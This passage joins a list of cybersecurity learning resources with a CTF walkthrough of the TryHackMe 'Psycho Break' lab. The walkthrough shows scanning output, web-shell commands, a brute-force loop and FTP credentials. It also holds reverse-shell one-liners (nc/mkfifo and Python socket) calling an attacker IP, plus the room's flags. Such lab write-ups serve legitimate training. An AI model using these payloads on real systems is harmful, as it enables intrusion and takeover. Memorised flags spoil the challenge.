Blueprints](https://www.amazon.com/Kali-Linux-Blueprints-Cameron-Buchanan/dp/1783985984) \- A book detailing how to create CTF challenges. - [Tips and Tactics for Creating Your Own CTF Event](https://dzone.com/articles/tips-and-tactics-for-creating-your-own-capture-the) ## Wargames and Challenge Sites - [WeChall](http://www.wechall.net/) \- Overview of hacking challenge and problem solving sites. - [zardus/wargame-nexus](https://github.com/zardus/wargame-nexus) \- An organized, PR-able list of wargame sites. - [Deuterium's Hacking Sites](https://csea-iitb.github.io/IITBreachers-wiki/2020/08/01/Hacking-Sites.html) \- Similar to the lists above, organized by category and with description for each site. - [OverTheWire](https://overthewire.org/wargames/) \- Popular wargames site with challenges at Bash scripting, linux exploitation and web exploitation. - [UnderTheWire](https://underthewire.tech/wargames) \- Similar to OverTheWire, but with Powershell scripting. - [CMD challenge](https://cmdchallenge.com/) \- Challenges created to teach shell basics and specifically bash. - [hackthissite.org](https://www.hackthissite.org/) \- Free, safe and legal training ground for hackers to test and expand their ethical hacking skills with challenges, CTFs, and more. - [SANS Holiday Hack Challenges](https://www.holidayhackchallenge.com/past-challenges/index.html) \- Every christmas since 2011 SANS puts out a big event with tons of great challenges, the events are avaliable after the holiday. - [Smash The Stack](http://smashthestack.org/) \- One of the oldest wargames. ## Linux - [Linux Journey](https://linuxjourney.com/) - [LinuxCommand.org](https://linuxcommand.org/index.php) \- A site for The Linux Command Line book by William Shotts. ## Conferences - [DEF CON](https://www.defcon.org/) \- One of the largest and most notable security conference. - [Black Hat](https://www.blackhat.com/) \- Similar to DEF CON, one of the premier information security conferences in the world. - [Security BSides](http://www.securitybsides.com/) \- A series of loosely affiliated information security conferences, multiple events each year including one in Israel. - [RSA](https://www.rsaconference.com/) \- A series of bussiness-oriented IT security conferences, initially on cryptography but now covers multiple areas. ## Forums - [r/netsec](https://www.reddit.com/r/netsec/) \- A community for technical news and discussion of information security and closely related topics. - [r/hacking](https://old.reddit.com/) - [r/cybersecurity](https://www.reddit.com/r/cybersecurity/) - [GreySec](https://greysec.net/) - [0x00sec](https://0x00sec.org/) - [Tuts 4 You's forum](https://forum.tuts4you.com/) ## Blogs - [Krebs on Security](https://krebsonsecurity.com/) \- In-depth security news and investigation. - [Schneier on Security](https://www.schneier.com/) - [Project Zero](https://googleprojectzero.blogspot.com/) - [Megabeets](https://www.megabeets.net/) ## Wikis & Megathreads - [r/hacking wiki](https://old.reddit.com/r/hacking/wiki/index) - [Developer-Y/cs-video-courses](https://github.com/Developer-Y/cs-video-courses) \- Free university CS courses with video lectures. - [gerryguy311/Free\_CyberSecurity\_Professional\_Development\_Resources](https://github.com/gerryguy311/Free_CyberSecurity_Professional_Development_Resources) \- An awesome list of resources for training, conferences, speaking, labs, reading, etc. that are free. - [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) \- A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - [LHC Resources](https://laptophackingcoffee.org/doku.php?id=wiki:resources) \- A list of resources from the laptop hacking coffee community. - [The-Art-of-Hacking\\h4cker](https://github.com/The-Art-of-Hacking/h4cker) \- Tons of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more. - [Simply Cyber's Resources](https://www.simplycyber.io/free-cyber-resources) \- An awesome list of resources for training, conferences, speaking, labs, reading, etc that are free. ## Guides & Notes - [Nickapic's Notes](https://enotes.nickapic.com/) \- Notes, resources and writeups related to Cybersecurity. - [HackTricks](https://book.hacktricks.xyz/) \- carlospolop's notes on tricks/techniques and what he learnt in CTFs, pentesting and reading on cybersecurity. ## Youtube Channels - [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - [Gynvael](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) - [PinkDraconian](https://www.youtube.com/channel/UCmXwpkCXmIKjoRLMsq9I3RA) - [247CTF](https://www.youtube.com/channel/UCtGLeKomT06x3xZ2SZp2l9Q) - [stacksmashing](https://www.youtube.com/c/stacksmashing/featured) - [Nahamsec](https://www.youtube.com/channel/UCCZDt7MuC3Hzs6IH4xODLBw) - [The Cyber Mentor](https://www.youtube.com/c/TheCyberMentor/featured) - [STÖK](https://www.youtube.com/channel/UCQN2DsjnYH60SFBIA6IkNwg) ## Podcasts - [Darknet Diaries](https://darknetdiaries.com/episode/)\- Fairly dramatic podcast on cyber by Jack Rhysider. - [StormCast](https://isc.sans.edu/podcast.html) \- Daily 5-10 minute information security threat updates, by SANS. - [Security Now](https://www.grc.com/securitynow.htm) - [The Cyberwire Podcasts](https://thecyberwire.com/podcasts) \- Podcasts provided by The Cyberwire, includes daily and weekly shows. - [Malicious Life](https://malicious.life/) \- A podcast by Cybereason. - [The Hacker Mind](https://thehackermind.com/) - [Command Line Heroes](https://www.redhat.com/en/command-line-heroes) \- A podcast by Red Hat. - [Smashing Security](https://www.smashingsecurity.com/) - [DAY\[0\]](https://dayzerosec.com/) - [Hackable?](https://hackablepodcast.com/) \- Similar to Darknet Diaries, by McAfee. - [CYBER](https://podcasts.google.com/feed/aHR0cHM6Ly9yc3MuYWNhc3QuY29tL2N5YmVy) \- A podcast by VICE. - [CPRadio](https://research.checkpoint.com/category/cpradio/) \- A weekly podcast discussing new threats and vulnerabilities, by CheckPoint. - [risky.biz](https://risky.biz/) - [Security Weekly](https://securityweekly.com/) ## Papers & E-zines - [Phrack Magazine](http://www.phrack.org/) ## Courses - [osirislab/Hack-Night](https://github.com/osirislab/Hack-Night) - [Roppers Academy](https://www.hoppersroppers.org/training.html) - [Cybrary](https://www.cybrary.it/) - [Professor Messer](https://www.professormesser.com/) <div align="center" style="font-size: 25px;"> ## Cryptography 🔐 </div> ## General - [David Wong's blog and channel](https://www.cryptologie.net/) \- David Wong is an author and blogger, he has a lot of content on cryptography and security in general. - [r/crypto](https://www.reddit.com/r/crypto/) \- A forum on cryptography and cryptanalysis. - [r/codes](https://www.reddit.com/r/codes/) \- A forum on basic cipher and codes. - [Crypton](https://github.com/ashutosh1206/Crypton) \- An educational library to learn and practice offensive and defensive cryptography. - [Cryptology ePrint Archive](https://eprint.iacr.org/) \- The Cryptology ePrint Archive provides rapid access to recent research in cryptology. ## Tools - [Cyberchef](https://gchq.github.io/CyberChef/) \- A web app for simple encryption, encoding, compression and data analysis. - [dCode](https://www.dcode.fr/en) \- Similar to Cyberchef with more ecryption and encoding systems. - [Pycryptodome](https://pycryptodome.readthedocs.io/en/latest/) \- Self-contained Python package of low-level cryptographic primitives. - [SageMath](https://www.sagemath.org/) \- Open-source mathematics software system using python 3, this system contains many cryptosystems and is used for algerbric calculation and cryptanalysis. - [CrypTool](https://www.cryptool.org/en/) \- E-learning platform for cryptography and cryptanalysis. - [CrackStation](https://crackstation.net/) \- A tool for cracking hashes using massive pre-computed lookup tables. - [factordb](http://factordb.com/) \- A tool for factoring numbers using a database of known factorings. ## Courses - [Cryptography I](https://www.coursera.org/learn/crypto) \- A free online introduction course in cryptography by Dan Boneh. - [Crypto101](https://www.crypto101.io/) \- An introductory course on cryptography, freely available for programmers of all ages and skill levels. - [Introduction to Cryptography by Christof Paar](https://www.youtube.com/channel/UC1usFRN4LCMcfIV7UjHNuQg/videos) \- A comprehensive introduction to modern applied crypto. Only high school math is required to follow the lectures. - [Block Breakers](https://www.davidwong.fr/blockbreakers/index.html) \- A course on block ciphers and attacks on block ciphers. ## Books - [CrypTool Book](https://www.cryptool.org/en/documentation/ctbook) \- Good free book in cryptography for people without mathematical background. - [Serious Cryptography](https://nostarch.com/seriouscrypto) -A Practical Introduction to Modern Encryption. - [Introduction to Modern Cryptography](https://www.amazon.com/Introduction-Modern-Cryptography-Principles-Protocols/dp/1584885513) \- An introduction to the core principles of modern cryptography. - [A Graduate Course in Applied Cryptography](http://toc.cryptobook.us/) \- A WIP cryptography book by Dan Boneh and Victor Shoup. - [Handbook of Applied Cryptography](http://cacr.uwaterloo.ca/hac/) \- An overview of cryptography, a bit old but a good introductory book. ## Learning Platforms & Exercises - [Cryptohack](https://cryptohack.org/) \- A fun platform for learning modern cryptography. - [Cryptopals](https://cryptopals.com/) \- A learning platform with a lot of exercises separated into sets. - [id0-rsa](https://id0-rsa.pub/) \- Similar to cryptopals. <div align="center" style="font-size: 25px;"> ## Web Exploitation 🕸 </div> ## General - [W3Schools](https://www.w3schools.com/) \- An educational website for learning web technologies. - [PwnFunction](https://www.youtube.com/c/PwnFunction) \- A YouTube channel discussing web exploitation techniques in a simple to understand manner. - [Hacksplaining](https://www.youtube.com/c/PwnFunction) \- A website for learning simple web exploitation techniques and vulnerabilities. - [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) ## Tools - [Burp Suite](https://portswigger.net/burp) \- A fully featured web application attack tool. - [Postman](https://www.postman.com/) \- A tool for making HTTP requests and test API's. - [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) \- A list of useful payloads and bypasses for Web Application Security. - [Damn Vulnerable Web Application](http://www.dvwa.co.uk/) \- A vulnerable PHP/MySQL web application for testing attacks and learning web application security. - [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/) \- Modern and sophisticated insecure web application for security training, demos, CTFs and etc. ## Courses - [CS 253 Web Security](https://web.stanford.edu/class/cs253/) \- A course giving a comprehensive overview of web security by the CS department in Stanford University. - [TryHackMe's Web Hacking Fundamentals](https://tryhackme.com/module/web-hacking-1) \- A module exploring the basics of web applications and basic exploitation. - [Hacker101](https://www.hacker101.com/) \- A free class for web security, created by hackerOne. ## Books - [The Web Application Hacker's Handbook](https://www.wiley.com/en-us/The+Web+Application+Hacker%27s+Handbook%3A+Finding+and+Exploiting+Security+Flaws%2C+2nd+Edition-p-9781118026472) \- A well-known book for learning basic web exploitation. ## Learning Platforms & Exercises - [PortSwigger's Web Security Academy](https://portswigger.net/web-security) \- Free online training center for web application security. - [OverTheWire's Natas](https://overthewire.org/wargames/natas/) \- A series of challenges teaching the basics of server-side web security. - [Immersive Labs](https://www.immersivelabs.com/) \- New platform for learning web exploitation. - [CTF Challenge](https://ctfchallenge.co.uk/) \- a series of web application hacking challenges. - [websec.fr](https://websec.fr/) <div align="center" style="font-size: 25px;"> ## Reversing & Binary Exploitation ⏮ </div> ## General - [Tuts 4 You](https://tuts4you.com/) \- A community dedicated to the sharing of knowledge and information on reverse engineering. - [Smashing The Stack For Fun And Profit](https://inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf) \- The first public paper on stack buffer overflow and one of the first public binary exploitation papers, it is really high quality and still relevant today. - [r/ReverseEngineering](https://www.reddit.com/r/ReverseEngineering/) \- A forum discussing topics in reverse engineering. - [tylerha97/awesome-reversing](https://github.com/tylerha97/awesome-reversing) \- A curated list of awesome reversing resources. - [wtsxDev/reverse-engineering](https://github.com/wtsxDev/reverse-engineering) \- List of awesome reverse engineering resources, currently unmaintained so you should check the fork for updated links. - [onethawt/reverseengineering-reading-list](https://github.com/onethawt/reverseengineering-reading-list) \- A list of Reverse Engineering articles, books, and papers. - [Binary Exploitation Notes](https://ir0nstone.gitbook.io/notes/) \- A collection of notes on binary exploitation and vulnerable binaries. - [muff-in/resources.md](https://gist.github.com/muff-in/ff678b1fda17e6188aa0462a99626121) \- Resources in Assembly Language / Reversing / Malware Analysis. - [ytisf/theZoo](https://github.com/ytisf/theZoo) \- A repository of live malwares for educational reasons. - [MalwareBazaar](https://bazaar.abuse.ch/) \- A project from abuse.ch with the goal of sharing malware samples with the infosec community ## Tools - [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware/) \- An interactive disassembler and debugger. - [Ghidra](https://ghidra-sre.org/) \- An open source reverse engineering framework created by the NSA, containing a disassember and decompiler. - [radare2](https://github.com/radareorg/radare2) \- A UNIX portable reversing framework. - [JADX](https://github.com/skylot/jadx) \- Dex to Java decompiler producing Java source code from Android Dex and Apk files. - [Apktool](https://ibotpeaches.github.io/Apktool/) \- A tool for reverse engineering 3rd party, closed, binary Android apps. - [Cutter](https://cutter.re/) \- Free and Open Source RE Platform powered by Rizin. - [ILSpy](https://github.com/icsharpcode/ILSpy) \- An open-source .NET assembly browser and decompiler. - [Frida](https://frida.re/) \- Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. ## Courses - [pwn.college](https://pwn.college/) \- A first-stage education platform for students to learn about, and practice, core cybersecurity concepts in a hands-on fashion. - [Nightmare](https://guyinatuxedo.github.io/) \- Intro to binary exploitation / reverse engineering course based around CTF challenges. - [Reverse Engineering For Everyone!](https://0xinfection.github.io/reversing/) \- Courses on reversing ARM and Intel architectures. - [Reverse Engineering for Beginners](https://www.begin.re/) \- A beginner course to RE and hooking (with the very original name) created by Ophir Harpaz. - [Malwareunicorn](https://malwareunicorn.org/) \- A site providing workshops and resources in reverse engineering. - [Binary Exploitation / Memory Corruption by LiveOverflow](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN) \- A series of YouTube videos created by LiveOverFlow about binary exploitation. From beginner to advanced. - [CS6038/CS5138 Malware Analysis, UC](https://class.malware.re/) \- An introductory course to Malware Analysis and Reverse Engineering from the department of EE and CS in the university of Cincinnati. - [CSCI 4968 Modern Binary Exploitation](http://security.cs.rpi.edu/courses/binexp-spring2015/) \- Course Material for CSCI 4986 in Rensselaer Polytechnic Institute. - [CSCI 4976 Malware Analysis](https://github.com/RPISEC/Malware) \- Course Material for CSCI 4976 in Rensselaer Polytechnic Institute. - [Binary Analysis Course](https://maxkersten.nl/binary-analysis-course/) - [Azeria Labs](https://azeria-labs.com/) \- Tutorials on ARM assembly and exploitation. - [Fu11Shade's Windows Exploitation](https://web.archive.org/web/20200506122824/https://fullpwnops.com/windows-exploitation-pathway.html) \- A pathway for learning Windows exploit development. - [OpenSecurityTraining](https://opensecuritytraining.info/) \- Detailed course on cybersecurity and specifically reverse engineering and binary exploitation, version 2.0 is coming mid-2021. - [heap-exploitation](https://heap-exploitation.dhavalkapil.com/) \- A short book for people who want to understand the internals of 'heap memory'. - [shellphish/how2heap](https://github.com/shellphish/how2heap) \- A repository for learning various heap exploitation techniques. - [Lena's Reversing for Newbies](https://forum.tuts4you.com/files/file/1307-lenas-reversing-for-newbies/) \- A collection of tutorials aimed particularly for newbie reverse engineers. ## Blogs - [shell-storm](http://shell-storm.org/) \- A blog by a security researcher about reversing. - [Corelan Cybersecurity Research](https://www.corelan.be/) \- Site created by a team of security researchers, mostly on windows reversing and exploitation. ## Books - [Reverse Engineering For Beginners](http://2thi.cc/doc/Reverse_Engineering_For_Beginners-Dennis_Yurichev.pdf) \- An open-source e-book on reverse engineering, highly praised and used worldwide in universities to teach assembly and reverse engineering. - [Reversing: Secrets of Reverse Engineering](https://www.wiley.com/en-il/Reversing%3A+Secrets+of+Reverse+Engineering+-p-9781118079768) \- This book provides readers with practical, in-depth techniques for software reverse engineering, a must-read for those who want to get to reverse engineering and binary exploitation. - [Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software](https://nostarch.com/malware) \- A book teaching you the tools and techniques used by professional malware analysts. - [Hacking: The Art of Exploitation, 2nd Edition](https://www.oreilly.com/library/view/hacking-the-art/9781593271442/) \- An introduction to hacking, reversing and binary exploitation. - [The Shellcoder's Handbook: Discovering and Exploiting Security Holes, 2nd Edition](https://www.wiley.com/en-us/The+Shellcoder%27s+Handbook%3A+Discovering+and+Exploiting+Security+Holes%2C+2nd+Edition-p-9780470080238) \- A book on finding security holes in any operating system or applications and exploiting them. - [The IDA Pro Book, 2nd Edition](https://nostarch.com/idapro2.htm) ## Learning Platforms & Exercises - [crackmes.one](https://crackmes.one/) \- A simple place where you can download crackmes to improve your reverse engineering skills. - [pwnable.kr](https://pwnable.kr/) \- A non-commercial wargame site which provides various pwn challenges regarding system exploitation. - [pwnable.xyz](https://pwnable.xyz/) \- pwnables for beginners. Most of the challenges were created for an internal event for OpenToAll's team (a CTF team anyone can join). - [pwnable.tw](https://pwnable.tw/)\- A wargame site for hackers to test and expand their binary exploiting skills. - [challenges.re](https://challenges.re/) \- A set of challenges with a variety of levels and technologies created by the author of Reverse Engineering For Beginners. - [reversing.kr](http://reversing.kr/) \- A set of reversing challenges with decreasing difficulty, good for beginners. - [ReversingHero](https://www.reversinghero.com/) \- Engineering self learning kit (x86_64 on linux) wrapped inside one binary file. It is made of 15 levels, with difficulty gradually increasing - [IO netgarage](http://io.netgarage.org/) \- One of the oldest and most popular [wargame](https://en.wikipedia.org/wiki/Wargame_%28hacking%29). - [The Flare-On Challenges](http://flare-on.com/) \- An archive of challenges from Flare-On events created by FireEye. - [Microcorruption](https://microcorruption.com/login) \- Challenges covering reversing of embedded devices. - [ROP Emporium](https://ropemporium.com/) \- Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering or bug hunting. <div align="center" style="font-size: 25px;"> ## Game Exploitation 👾 </div> ## General - [Guided Hacking](https://guidedhacking.com/) \- Especially Beginner Guide [here](https://guidedhacking.com/threads/ghb1-start-here-beginner-guide-to-game-hacking.5911/) - [GameHackingAcademy](https://gamehacking.academy/) - [Pwn Adventure](https://pwnadventure.com/) - [mrT4ntr4/CTF-Game-Challenges](https://github.com/mrT4ntr4/CTF-Game-Challenges) - [dsasmblr/game-hacking](https://github.com/dsasmblr/game-hacking) <div align="center" style="font-size: 25px;"> ## Forensics 🕵🏼‍♂️ </div> ## General - [MemLabs](https://github.com/stuxnet999/MemLabs) \- An educational, introductory set of CTF-styled challenges which is aimed to encourage people to get started with the field of Memory Forensics. - [corkami/pics](https://github.com/corkami/pics/tree/master/binary) \- corkami is a security researcher and illustrator, this repo contains his illustration of file formats specifications in a simple to understand manner. - [DFIR Diva](https://dfirdiva.com/) \- A blog on digital forensics and incident response, includes a great list of resources on this areas. - [AboutDFIR](https://aboutdfir.com/) \- A site for the DFIR community, with books, tutorials and guides on the subject. - [cugu/awesome-forensics](https://github.com/cugu/awesome-forensics) ## Books - [The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory](https://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098) - [Malware Analyst's Cookbook and DVD](https://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033/) ## Guides - [Basics of Memory Forensics](https://stuxnet999.github.io/volatility/2020/08/18/Basics-of-Memory-Forensics.html) <div align="center" style="font-size: 25px;"> ## Steganography 👻 </div> - [The Theorist Gateway Toolbox](https://help.thetheoristgateway.com/pages/toolbox) \- Slides describing techniques and tools for hiding and extracting information, the ARG itself is very good too. - [ae27ff](https://ae27ff.meme.tips) \- a set of levels including simple ciphers, steganography, different types of encodings, and familiarity with internet resources. <div align="center" style="font-size: 25px;"> ## Coding 💻 </div> ## General - [Michael0x2a/curated-programming-resources](https://github.com/Michael0x2a/curated-programming-resources) \- A curated list of resources for learning programming. - [The Odin Project](https://www.theodinproject.com/home) \- A site to learn web development free. ## Courses - [Codecademy](https://www.codecademy.com/) \- A platform for learning programming languages. - [Corey Schafer's Python Course](https://www.youtube.com/channel/UCCezIgC97PvUuR4_gbFUs5g/) \- A good python course for beginner and advanced coders - [FreeCodeCamp](https://www.freecodecamp.org/) \- A friendly community where you can learn to code for free, with courses on everything coding related, including cyber security. ## Challenges - [leetcode](https://leetcode.com/) \- A site to practice your coding skills with coding challenges. - [HackerRank](https://www.hackerrank.com/) \- Similar to leetcode. - [Codewars](https://www.codewars.com/) \- Improve your skills by training with others on real code challenges. - [Codesignal](https://codesignal.com/developers/) \- Similar to the sites above, but focused more on interview practice. - [Project Euler](https://projecteuler.net/) \- A series of challenging mathematical/computer programming problems. <div align="center" style="font-size: 25px;"> ## Pentesting 🖧 </div> ## General - [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) \- A collection of awesome penetration testing and offensive cybersecurity resources. ## Courses - [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) ## Learning Platforms & Exercises - [Hack The Box](https://www.hackthebox.eu/) \- An online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field. - [HTB Academy](https://academy.hackthebox.eu/) \- A new platform by Hack The Box for learning cybersecurity. - [TryHackMe](https://tryhackme.com/) \- A free online platform for learning cyber security and pentesting, using hands-on exercises and labs, all through your browser. - [Root Me](https://www.root-me.org/) \- Similar to TryHackMe and Hack The Box. - [VulnHub - Vulnerable By Design](https://www.vulnhub.com/) \- A growing collection of vulnerable virtual machine to hack and practice on. - [Hack My VM](https://hackmyvm.eu/) \- A new site similar to vulnhub with more gamification elements. - [Exploit Exercises](http://exploit.education/) \- One of the most known exploitation challenges, mostly linux exploitation and binary exploitation. - [PentesterLab](https://pentesterlab.com/) \- Exercises in pentesting, with a lot of free ones. - [PentesterAcademy](https://www.pentesteracademy.com/) \- Similar to PentesterLab, high quality but all the courses require membership. ## Books - [Metasploit: The Penetration Tester's Guide](https://nostarch.com/metasploit) <div align="center" style="font-size: 25px;"> ## Bug Bounty 🐞 </div> ## Platforms - [Bugcrowd](https://www.bugcrowd.com/) - [hackerone](https://www.hackerone.com/) ## Courses - [Bugcrowd University](https://github.com/bugcrowd/bugcrowd_university) ## Books - [Real-World Bug Hunting: A Field Guide to Web Hacking](https://nostarch.com/bughunting)
# Psycho Break Help Sebastian and his team of investigators to withstand the dangers that come ahead. [Psycho Break](https://tryhackme.com/room/psychobreak) ## Topic's - Network Enumeration - Web Poking - Cryptography - Vigenère - Morse Code (Audio) - OSINT - Web Enumeration - Directory Traversal - Reverse Engineering - Steganography - Brute Forcing (Binary) - Exploitation Crontab ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ```html <!-- Sebastian sees a path through the darkness which leads to a room => /sadistRoom --> <!-- To find more about Sadist visit https://theevilwithin.fandom.com/wiki/Sadist --> <p> Decode this piece of text "Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv" and get the key to access the map </p> <p> https://www.boxentriq.com/code-breaking/cipher-identifier Grant_me_access_to_the_map_please http://10.10.172.137/map.php <!-- I think I'm having a terrible nightmare. Search through me and find it ... --> kali@kali:~/CTFs/tryhackme/Psycho Break$ gobuster dir -u http://10.10.172.137/SafeHeaven/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.172.137/SafeHeaven/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/15 15:37:53 Starting gobuster =============================================================== /imgs (Status: 301) /keeper (Status: 301) =============================================================== 2020/11/15 15:50:37 Finished =============================================================== <!-- To find more about the Keeper visit https://theevilwithin.fandom.com/wiki/The_Keeper --> st. augustine lighthouse You Got The Keeper Key !!! Here is your key : 48ee41458eb0b43bf82b986cecf3af01 <!-- There is something called "shell" on current page maybe that'll help you to get out of here !!!--> <!-- To find more about the Spider Lady visit https://theevilwithin.fandom.com/wiki/Laura_(Creature) --> http://10.10.172.137/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php?shell=ls http://10.10.172.137/abandonedRoom/be8bc662d1e36575a52da40beba38275/herecomeslara.php?shell=ls%20.. 680e89809965ec41e64dc7e447f175ab be8bc662d1e36575a52da40beba38275 index.php http://10.10.172.137/abandonedRoom/680e89809965ec41e64dc7e447f175ab/ kali@kali:~/CTFs/tryhackme/Psycho Break$ cat you_made_it.txt You made it. Escaping from Laura is not easy, good job .... kali@kali:~/CTFs/tryhackme/Psycho Break$ unzip helpme.zip Archive: helpme.zip inflating: helpme.txt inflating: Table.jpg kali@kali:~/CTFs/tryhackme/Psycho Break$ cat helpme.txt From Joseph, Who ever sees this message "HELP Me". Ruvik locked me up in this cell. Get the key on the table and unlock this cell. I'll tell you what happened when I am out of this cell. SHOWME kali@kali:~/CTFs/tryhackme/Psycho Break$ cat thankyou.txt From joseph, Thank you so much for freeing me out of this cell. Ruvik is nor good, he told me that his going to kill sebastian and next would be me. You got to help Sebastian ... I think you might find Sebastian at the Victoriano Estate. This note I managed to grab from Ruvik might help you get inn to the Victoriano Estate. But for some reason there is my name listed on the note which I don't have a clue. -------------------------------------------- // \\ || (NOTE) FTP Details || || ================== || || || || USER : joseph || || PASSWORD : intotheterror445 || || || \\ // -------------------------------------------- Good luck, Be carefull !!! kali@kali:~/CTFs/tryhackme/Psycho Break$ chmod +x program kali@kali:~/CTFs/tryhackme/Psycho Break$ strings random.dic > brute.txt kali@kali:~/CTFs/tryhackme/Psycho Break$ while read LINE; do ./program "$LINE"; done < brute.txt | grep Correct kidman => Correct kali@kali:~/CTFs/tryhackme/Psycho Break$ ./program kidman kidman => Correct Well Done !!! Decode This => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33 https://keypad-translator.glitch.me/ k i d m a n s p a s s w o r d i s s o s t r a n g e KIDMANSPASSWORDISSOSTRANGE kidman kidman@evilwithin:~$ cat user.txt 4C72A4EF8E6FED69C72B4D58431C4254 kidman@evilwithin:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */2 * * * * root python3 /var/.the_eye_of_ruvik.py rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.106.222 9001 >/tmp/f import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.106.222",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); kali@kali:~/CTFs/tryhackme/Psycho Break$ nc -lnvp 9001 Listening on 0.0.0.0 9001 Connection received on 10.10.172.137 57536 bash: cannot set terminal process group (1763): Inappropriate ioctl for device bash: no job control in this shell root@evilwithin:~# cat /root/root.txt cat /root/root.txt BA33BDF5B8A3BFC431322F7D13F3361E root@evilwithin:~# </p> ``` ## Task 1 Recon This room is based on a video game called evil within. I am a huge fan of this game. So I decided to make a CTF on it. With my storyline :). Your job is to help Sebastian and his team of investigators to withstand the dangers that come ahead. [Hints are provided as you progress through the challenge] The VM might take up to 2-3 minutes to fully boot up. Deploy the machine. `No answer needed` ``` kali@kali:~/CTFs/tryhackme/Psycho Break$ sudo nmap -p- -sS -sC -sV -O 10.10.172.137 Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-15 15:24 CET Nmap scan report for 10.10.172.137 Host is up (0.033s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA) | 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA) |_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome To Becon Mental Hospital No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/15%OT=21%CT=1%CU=40600%PV=Y%DS=2%DC=I%G=Y%TM=5FB13A OS:5F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OP OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST OS:11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC OS:N(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F= OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5( OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z% OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C OS:D=S) Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.91 